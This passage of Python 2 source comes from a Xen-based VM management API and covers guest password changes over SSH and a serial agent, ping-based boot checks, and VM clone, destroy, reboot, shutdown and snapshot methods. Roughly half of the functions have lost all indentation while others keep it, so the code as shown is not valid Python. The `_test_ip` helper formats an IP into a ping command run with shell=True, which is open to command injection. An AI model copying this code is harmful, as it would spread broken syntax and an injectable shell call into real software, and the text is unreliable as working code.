                        set_passwd = threading.Thread(target=self._set_passwd_via_serial, name='set_passwd_via_serial',\
                                                      kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
                                                              'vm_type':vm_type})
                        set_passwd.start()
                else:
                    check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd_via_serial, name='check_start_and_set_passwd_via_serial',\
                                                      kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
                                                              'vm_type':vm_type})
                    check_start_and_set_passwd.start()
#            finally:
#                self.__set_passwd_lock__.release()
            #6. get record of VM
            st4 = time.time()
            VM_record = self._VM_get_record(session, vm_ref).get('Value')
            if VM_record and isinstance(VM_record, dict):
                VM_record['setpasswd'] = is_setPasswd
            e4 = time.time() - st4
            e5 = time.time() - st1
            time_log['get record'] = e4
            time_log['total'] = e5
            log.debug('return vm record----> %s' % VM_record)
            log.debug('8.vm create from template Succeed!>>>>>>>>>>')
            log.debug('===vm(%s) set config cost time===' % vm_ref)
#            time_log['set config'] = e1
#            time_log['load os'] = e2
#            time_log['set passwd'] = e3
            if time_log.get('set config', ''):
                log.debug('set vm vcpu,memeory and io rate limit cost time: %s' % e1)
#            if time_log.get('load os', ''):
#                log.debug('vmstart and load OS cost time: %s' % e2)
#            if time_log.get('set passwd'):
#                log.debug('vm set passwd cost time: %s' % e3)
            if time_log.get('get record'):
                log.debug('vm get record cost time: %s' % e4)
            if time_log.get('total'):
                log.debug('>>>>Total time<<<<: %s' % e5)
            log.debug('=====vm(%s) end=====' % (vm_ref))
            return xen_api_success(VM_record)
        except Exception, exn:
            log.error(exn)
            if isinstance(exn, VMBadState):
                return xen_api_error(['VM start error, bad power state.'])
            # Rollback: shut down and destroy the VM plus its VDIs on failure.
            log.error('9.vm create error....shutdown and remove vm(%s)' % vm_ref)
            self._VM_hard_shutdown(session, vm_ref)
            self.VM_destroy(session, vm_ref, True)
            storage = self._get_BNStorageAPI_instance()
            storage.VDI_destroy(session, vm_ref)
            return xen_api_error(['VM start and change password error'])
    def _check_start_and_set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
        '''
        @author: wuyuewen
        @summary: Internal method. Thread body started by _VM_set_config: wait
            (up to 120 pings, 1s deadline each) for the guest OS to answer on
            vm_ip, then change its password over SSH via _VM_set_passwd.
            Return values are discarded by the caller (runs in a daemon-style
            worker thread); logging is the only observable outcome.
        '''
        timeout = 120
        deadline = 1
        st2 = time.time()
        log.debug('6. start to check whether vm load OS>>>>>')
        is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
        e2 = time.time() - st2
        log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
#        time_log['load os'] = e2
        if not is_on:
            log.debug('7. vm(%s) cannot ping in %s times' % (vm_ref, str(timeout * 1)))
            return xen_api_error('vm(%s) cannot ping in %s' % (vm_ref, str(timeout * 1)))
        #raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
        # Only attempt the change when both old and new passwords were supplied.
        if is_on and vm_passwd and origin_passwd:
#            self.__set_passwd_lock__.acquire()
#            try:
            st3 = time.time()
            is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
            log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
            if not is_setPasswd:
                log.debug('vm(%s) set passwd failed!' % vm_ref)
            e3 = time.time() - st3
            log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
#            time_log['set passwd'] = e3
    def _check_start_and_set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
        '''
        @author: wuyuewen
        @summary: Internal method. Thread body started by _VM_set_config: wait
            (up to 200s) for the in-guest agent to answer a ping on the serial
            channel, then change the guest password over the same channel.
            Return values are discarded by the caller (worker thread).
        '''
        timeout = 200
        st2 = time.time()
        log.debug('6. start to check whether vm load OS via serial>>>>>')
        is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
        e2 = time.time() - st2
        log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
#        time_log['load os'] = e2
        if not is_on:
            log.debug('7. vm(%s) cannot ping via serial in %s times' % (vm_ref, str(timeout * 1)))
            return xen_api_error('vm(%s) cannot ping via serial in %s' % (vm_ref, str(timeout * 1)))
        #raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
        if is_on and vm_passwd:
#            self.__set_passwd_lock__.acquire()
#            try:
#            st3 = time.time()
            self._set_passwd_via_serial(session, vm_ref, vm_passwd, vm_type)
#            log.debug("7. set passwd via serial result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
#            if not is_setPasswd:
#                log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
#            e3 = time.time() - st3
#            log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
#            time_log['set passwd'] = e3
def _set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
st3 = time.time()
is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# test if ping ip return true
def _test_ip(self, ip, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
import os
import subprocess
import datetime
time1 = datetime.datetime.now()
cmd = "ping -w %s %s" % (deadline, ip)
re = subprocess.call(cmd, shell=True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s result: %s, cost time: %s' %(ip, re, str(t)))
if re:
return False
else:
return True
    def _set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
        '''
        @author: wuyuewen
        @summary: Internal method. Change the guest password through the VM's
            emulated serial channel: resolve the (ip, port) the serial device is
            exposed on, then send an Agent.SetPassword JSON request via Netctl.
            Runs as a worker-thread body; failures are logged, the return value
            is discarded by callers.
        '''
        st3 = time.time()
        response = self._VM_get_platform_serial(session, vm_ref)
        if cmp(response['Status'], 'Failure') == 0:
            log.exception('VM_get_platform_serial failed!')
            return xen_api_success(False)
        address = response.get('Value')
        log.debug('serial port: %s' % str(address))
        if not address:
            log.error('VM serial not correct!')
            return xen_api_success(False)
        (ip, port) = address
        import json
        # The in-guest agent expects the platform's admin account name.
        if cmp(vm_type, 'linux') == 0:
            userName = 'root'
        else:
            userName = 'Administrator'
        json_obj = json.dumps({'requestType':'Agent.SetPassword', 'userName':userName, 'password':vm_passwd})
        is_setPasswd = Netctl.serial_opt(ip, port, json_obj, False)
        log.debug("7. set passwd via serial, result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
        if not is_setPasswd:
            log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
        e3 = time.time() - st3
        log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
def _VM_start_checkout(self, vm_ip, timeout = 60, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM load os checkout>>>>')
cnt = 0
while cnt < timeout:
if self._test_ip(vm_ip, deadline):
return True
# time.sleep(1)
cnt += 1
log.debug('vm not start>>>>>')
return False
    def _VM_start_checkout_via_serial(self, session, vm_ref, timeout = 60):
        '''
        @author: wuyuewen
        @summary: Internal method. Check whether the guest OS has booted by
            sending an Agent.Ping over the VM's serial channel (for guests
            without a known IP). Returns True when the agent answers within
            <timeout>; False or xen_api_success(False) on failure paths.
        '''
        log.debug('VM load os checkout>>>>')
        response = self._VM_get_platform_serial(session, vm_ref)
        if cmp(response['Status'], 'Failure') == 0:
            log.exception('VM_get_platform_serial failed!')
            # NOTE(review): failure paths return a dict (xen_api_success(False))
            # while success returns a bare bool — callers only truth-test it,
            # and a non-empty dict is truthy; confirm before relying on it.
            return xen_api_success(False)
        address = response.get('Value')
        log.debug('serial port: %s' % str(address))
        if not address:
            log.error('VM serial not correct!')
            return xen_api_success(False)
        (ip, port) = address
        import json
        json_obj = json.dumps({'requestType':'Agent.Ping'})
        log.debug(json_obj)
        # Netctl handles the timeout internally; a single call suffices.
        if self._test_serial(ip, port, json_obj, timeout):
            return True
#        cnt = 0
#        while cnt < timeout:
#            if self._test_serial(ip, port, json_obj):
#                return True
##            time.sleep(1)
#            cnt += 1
        log.debug('vm not start>>>>>')
        return False
def _test_serial(self, ip, port, json_obj, timeout):
'''
@author: wuyuewen
@summary: Internal method.
'''
import datetime
time1 = datetime.datetime.now()
re = Netctl.serial_opt(ip, port, json_obj, False, timeout, True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s:%s result: %s, cost time: %s' %(ip, port, re, str(t)))
return re
'''
generate template from vm
1. vm_clone
2. set template
return True or False
'''
    def VM_create_image(self, session, vm_ref, template_name, template_uuid):
        '''
        @author: wuyuewen
        @summary: Generate template from VM, contain several options:
                1. vm_clone
                2. set template
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param template_name: new template name.
        @param template_uuid: template uuid
        @return: True | False
        @rtype: dict.
        '''
        log.debug('==========vm(%s) create template==========' % vm_ref)
        result = False
        try:
            # Clone the VM under the requested template uuid, then flag the
            # clone as a template.
            response = self.VM_clone(session, vm_ref, template_name, None, template_uuid)
            if response.get('Status') == 'Success':
                domuuid = response.get('Value')
                # Sanity check: the clone must have taken the uuid we asked for.
                # An AssertionError lands in the except-branch and triggers cleanup.
                assert domuuid == template_uuid
                log.debug('new VM uuid:%s' % domuuid)
                self.VM_set_is_a_template(session, template_uuid, True)
                result = True
        except Exception, exn:
            # On any failure, remove the half-made template clone.
            log.exception(exn)
            self.VM_destroy(session, template_uuid, True)
        finally:
            log.debug('============end===============')
            # NOTE: return inside finally also suppresses any exception the
            # except-handler itself might raise; result stays False in that case.
            return xen_api_success(result)
    def VM_clone(self, session, vm_ref, newname, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
        '''
        @author: wuyuewen
        @summary: Internal method. Clone VM, contain several options:
                1. get origin VM's VDIs
                2. clone VM
                3. if clone VM success, clone VDIs
        @param session: session of RPC.
        @param vm_ref: origin VM's uuid
        @param newname: new VM's name
        @param vdi_uuid_map: origin VM's VDIs mapping to new clone VDIs
        @param newuuid: new VM's uuid
        @param vdi_exists: True | False, if new VDIs exist or not(create in advance).
        @return: True | False
        @rtype: dict.
        '''
        log.debug('in VM_clone')
        storage = self._get_BNStorageAPI_instance()
        if not vdi_uuid_map:
            # No map supplied: build one — every source VDI gets a fresh uuid,
            # and the system VDI is given the new VM's uuid.
            vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
            sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
            if not newuuid:
                newuuid = genuuid.gen_regularUuid()
            check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
            if not check_uuid:
                return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
            vdi_uuid_map = {}
            vdis = vdis_resp.get('Value', [])
            if vdis:
                for vdi in vdis:
                    vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
                if sys_vdi in vdis:
                    vdi_uuid_map[sys_vdi] = newuuid
        if BNPoolAPI._isMaster:
            h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            #mapping parrent vdi's uuid to new one.
            h_ip = BNPoolAPI.get_host_ip(h_ref)
            # Host-local VMs are cloned entirely on their owning host.
            if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                return xen_rpc_call(h_ip, 'VM_clone_local', vm_ref, newname, vdi_uuid_map, newuuid)
            log.debug("VM_clone, vdi map:")
            log.debug(vdi_uuid_map)
            # Clone on whichever host owns the source VM, then register the
            # new VM in the pool's bookkeeping.
            if cmp(h_ref, XendNode.instance().uuid) == 0:
                log.debug("clone from master")
                response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
                domuuid = response.get('Value')
                if domuuid:
                    BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
            else:
                log.debug("clone from slave")
                response = xen_rpc_call(h_ip, 'VM_clone', vm_ref, newname, vdi_uuid_map, newuuid)
                domuuid = response.get('Value')
                log.debug('New domain uuid: %s' % domuuid)
                if domuuid:
                    BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
            # Clone the disks unless the caller pre-created them (vdi_exists).
            if not vdi_exists:
                storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
#            log.debug("return from async")
            return response
        else:
            log.debug('in VM_clone local')
            if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                response = self.VM_clone_local(session, vm_ref, newname, vdi_uuid_map, newuuid)
            else:
                log.debug('in VM_clone local, else')
                response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
                domuuid = response.get('Value')
                if not vdi_exists:
                    storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
            return response
def VM_clone_local(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
log.debug('in _VM_clone')
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100, xendom.domain_clone, vm_ref, newname,\
vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
    '''
    When cloning a VM, the caller must also pass the MAC address
    (see VM_clone_MAC below).
    '''
    def VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
        '''
        @author: wuyuewen
        @summary: Clone VM and assign the given MAC address to the clone.
                  Same flow as VM_clone, with the MAC threaded through to
                  domain_clone_MAC.
        @param session: session of RPC.
        @param vm_ref: origin VM's uuid
        @param newname: new VM's name
        @param mac_addr: MAC address for the cloned VM's vif
        @param vdi_uuid_map: origin VDI uuid -> new VDI uuid; built when absent
        @param newuuid: new VM's uuid; generated when absent
        @param vdi_exists: skip the VDI clone step when True
        @see: VM_clone
        '''
        log.debug('in VM_clone with MAC...')
        storage = self._get_BNStorageAPI_instance()
        if not vdi_uuid_map:
            vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
            sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
            if not newuuid:
                newuuid = genuuid.gen_regularUuid()
            check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
            if not check_uuid:
                return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
            vdi_uuid_map = {}
            vdis = vdis_resp.get('Value', [])
            if vdis:
                for vdi in vdis:
                    vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
                # The clone's system VDI takes the new VM's uuid.
                if sys_vdi in vdis:
                    vdi_uuid_map[sys_vdi] = newuuid
        if BNPoolAPI._isMaster:
            h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            #mapping parrent vdi's uuid to new one.
            h_ip = BNPoolAPI.get_host_ip(h_ref)
            if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                return xen_rpc_call(h_ip, 'VM_clone_local_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
            log.debug("VM_clone, vdi map:")
            log.debug(vdi_uuid_map)
            if cmp(h_ref, XendNode.instance().uuid) == 0:
                log.debug("clone from master")
                response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
            else:
                log.debug("clone from slave")
                response = xen_rpc_call(h_ip, 'VM_clone_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
            if cmp(response.get('Status'), 'Success') == 0:
                domuuid = response.get('Value')
                if not domuuid:
                    # Defensive: fall back to the uuid we chose ourselves when
                    # the clone succeeded but did not report a domain uuid.
                    log.exception('WARNING: VM_clone_MAC, domuuid not return!!!')
                    domuuid = newuuid
                    BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
                else:
                    BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
                if not vdi_exists:
                    storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
            return response
        else:
            if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                response = self.VM_clone_local_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
            else:
                log.debug('in VM_clone MAC')
                log.debug("VM_clone, vdi map:")
                log.debug(vdi_uuid_map)
                response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
                domuuid = response.get('Value')
                if not vdi_exists:
                    storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
            return response
def VM_clone_local_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
log.debug('VM_clone_local_MAC >>>>>')
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid = newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_MAC
'''
log.debug('in _VM_clone_MAC')
xendom = XendDomain.instance()
domuuid = xendom.domain_clone_MAC(vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = XendTask.log_progress(0, 100, xendom.domain_clone_MAC, vm_ref, newname, mac_addr,\
# vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
def VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Clone VM system VDI
@param session: session of RPC.
@param vm_ref: VM's uuid
@param newuuid: new VDI uuid
@return: True | False
@rtype: dict.
@raise xen_api_error:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_clone_system_VDI', vm_ref, newuuid)
else:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
def _VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_system_VDI
'''
try:
storage = self._get_BNStorageAPI_instance()
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value')
if sys_vdi:
vdi_uuid_map = { sys_vdi : newuuid }
new_vdi = storage.VDI_clone(session, vdi_uuid_map, newuuid, newuuid).get('Value')
if new_vdi:
return xen_api_success(new_vdi)
else:
return xen_api_error(['VM_clone_system_VDI', ' Failed'])
else:
return xen_api_error(['VM_clone_system_VDI', ' orig VDI not found!'])
except Exception, exn:
log.debug(exn)
storage.VDI_destroy(session, newuuid)
return xen_api_error(['VM_clone_system_VDI', ' Exception'])
    def VM_destroy(self, session, vm_ref, del_vdi=False, del_ha_sxp=True, update_pool_structs=True):
        '''
        @author: wuyuewen
        @summary: Destroy the specified VM. The VM is completely removed from the system.
                  This function can only be called when the VM is in the Halted State.
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param del_vdi: True | False, also destroy the VM's VDIs
        @param del_ha_sxp: True | False, destroy sxp file in HA dir.
        @param update_pool_structs: True | False, update pool structs in Xend memory.
        @return: True | False
        @rtype: dict.
        @raise xen_api_error:
        '''
        storage = self._get_BNStorageAPI_instance()
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            host_ip = BNPoolAPI.get_host_ip(host_ref)
            if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                log.debug("destroy local vm: %s" % vm_ref)
                return xen_rpc_call(host_ip, 'VM_destroy_local', vm_ref, True)
            # Snapshot the VDI list *before* destroying the domain so the
            # disks can still be resolved afterwards.
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
                response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
            else:
                # NOTE(review): del_vdi is forwarded to the remote host here,
                # yet the loop below also destroys the same VDIs from the
                # master -- confirm this does not double-delete.
                vdis = xen_rpc_call(host_ip, 'VDI_get_by_vm', vm_ref).get('Value')
                response = xen_rpc_call(host_ip, 'VM_destroy', vm_ref, del_vdi, del_ha_sxp, update_pool_structs)
            if update_pool_structs:
                BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
            if del_vdi and vdis:
                for vdi in vdis:
                    log.debug('destroy vdi: %s' % vdi)
                    storage.VDI_destroy(session, vdi)
            return response
        else:
            if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                response = self.VM_destroy_local(session, vm_ref, del_vdi)
            else:
                vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
                response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
                if del_vdi and vdis:
                    for vdi in vdis:
                        log.debug('destroy vdi: %s' % vdi)
                        storage.VDI_destroy(session, vdi)
            return response
def VM_destroy_local(self, session, vm_ref, del_vdi=False):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, False)
BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
if del_vdi and vdis:
for vdi in vdis:
storage._VDI_destroy(session, vdi)
return response
    def _VM_destroy(self, session, vm_ref, del_ha_sxp=False, update_pool_structs=True):
        '''
        @author: wuyuewen
        @summary: Internal method. Tear down the domain on this host: first
                  clear disk IO limits, then delete the domain through the
                  task-logged do_vm_func helper.
        @see: VM_destroy
        '''
        self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
        # NOTE(review): `dom` is unused since the vif ip-map cleanup below was
        # commented out; the lookup may still act as an existence check --
        # confirm before removing it.
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
#        vifs = dom.get_vifs()
#        if vifs:
#            for vif in dom.get_vifs():
#                self._VM_del_ip_map(session, vm_ref, vif)
        return XendTask.log_progress(0, 100, do_vm_func,
                                     "domain_delete", vm_ref, del_ha_sxp, update_pool_structs)
def VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: In some uncommon conditions VM will destroy by Xend but VM disk(VDIs) still exist.
This method can find VM via HA stored sxp file.
@param session: session of RPC.
@param label: label(uuid or name) of VM
@param exactMatch: full match the given label
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
all_vms = self._VM_get_lost_vm_by_label(session, label, exactMatch).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_label', label, exactMatch)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_label(session, label, exactMatch)
def _VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_label
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_label(label, exactMatch))
def VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: In some uncommon conditions VM will destroy by Xend but VM disk(VDIs) still exist.
This method can find VM via HA stored sxp file.
@param session: session of RPC.
@param date1: date of start
@param date2: date of end
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
now_vms = []
all_vms = self._VM_get_lost_vm_by_date(session, date1, date2).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_date', date1, date2)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
now_vms_resp = self.VM_get_all(session)
if cmp(now_vms_resp['Status'], 'Success') == 0:
now_vms = now_vms_resp.get("Value")
if now_vms:
for i in all_vms.keys():
vm_uuid_s = re.search("\/(S+)\/", i)
if i in now_vms:
del all_vms[i]
continue
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_date(session, date1, date2)
def _VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_date
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_date(date1, date2))
def VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown and immediately restart the VM.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_reboot(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_reboot', vm_ref)
else:
return self._VM_hard_reboot(session, vm_ref)
def _VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_reboot
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_reset", vm_ref)
def VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_shutdown(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_shutdown', vm_ref)
i = 0
time_out = 120
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref)['Value']
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
break
elif cmp(i, time_out) > 0:
break
else:
time.sleep(0.5)
continue
else:
return self._VM_hard_shutdown(session, vm_ref)
def _VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_shutdown
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_destroy", vm_ref)
def VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_pause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_pause', vm_ref)
else:
return self._VM_pause(session, vm_ref)
def _VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_pause", vm_ref)
# do snapshot for system vdi of vm
def VM_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Take a snapshot of VM's system VDI. The sragent running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_snapshot_vdi(session, vdi_ref, name)
# snapshot for vdi of vm
def _VM_snapshot_vdi(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_snapshot
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.exception('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record(session, sr).get('Value')
if not sr_rec:
log.exception('Get SR record failed!')
return xen_api_success(False)
# log.debug("sr rec : %s" % sr_rec)
sr_type = sr_rec.get('type')
result = False
